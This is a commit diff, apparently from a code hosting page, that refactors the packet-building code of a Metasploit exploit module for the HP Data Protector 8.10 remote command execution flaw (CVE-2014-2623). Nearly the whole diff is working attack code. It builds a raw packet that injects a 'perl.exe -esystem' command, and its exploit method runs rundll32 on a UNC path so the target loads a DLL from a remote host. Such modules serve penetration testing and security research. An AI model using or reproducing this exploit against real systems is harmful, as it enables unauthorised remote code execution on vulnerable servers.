Clean packet building
This commit is contained in:
parent
e04ff3ee24
commit
62dde22d88
|
@ -26,8 +26,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'References' =>
|
||||
[
|
||||
['CVE', '2014-2623'],
|
||||
['OSVDB', '109069'],
|
||||
['EDB', '34066'],
|
||||
['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818'],
|
||||
['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
|
@ -37,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'HP Data Protector 8.10', { 'Offset' => 46 } ],
|
||||
[ 'HP Data Protector 8.10 / Windows', { } ],
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Nov 02 2014'))
|
||||
|
@ -90,21 +91,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null
|
||||
end
|
||||
|
||||
def exec_bar(cmd)
|
||||
def send_pkt(cmd)
|
||||
cmd.gsub!("\\", "\\\\\\\\")
|
||||
|
||||
cmd_no = target['Offset'] + cmd.length
|
||||
|
||||
pkt = "\x00\x00\x00"
|
||||
pkt << cmd_no
|
||||
pkt << "\x32\x00\x01\x01\x01\x01\x01\x01\x00\x01\x00\x01"
|
||||
pkt << "\x00\x01\x00\x01\x01\x00\x20\x32\x38\x00\x5c\x70"
|
||||
pkt << "\x65\x72\x6c\x2e\x65\x78\x65\x00\x20\x2d\x65\x73\x79\x73\x74\x65\x6d" # perl -e system('cmd')
|
||||
pkt << "('#{cmd}')" # Executable
|
||||
pkt << "\x00"
|
||||
pkt = "2\x00"
|
||||
pkt << "\x01\x01\x01\x01\x01\x01\x00"
|
||||
pkt << "\x01\x00"
|
||||
pkt << "\x01\x00"
|
||||
pkt << "\x01\x00"
|
||||
pkt << "\x01\x01\x00 "
|
||||
pkt << "28\x00"
|
||||
pkt << "\\perl.exe\x00 "
|
||||
pkt << "-esystem('#{cmd}')\x00"
|
||||
|
||||
connect
|
||||
sock.put(pkt)
|
||||
sock.put([pkt.length].pack('N') + pkt)
|
||||
disconnect
|
||||
end
|
||||
|
||||
|
@ -114,6 +115,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
print_status("#{peer} - Trying to execute remote DLL...")
|
||||
sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}"
|
||||
exec_bar(sploit)
|
||||
send_pkt(sploit)
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue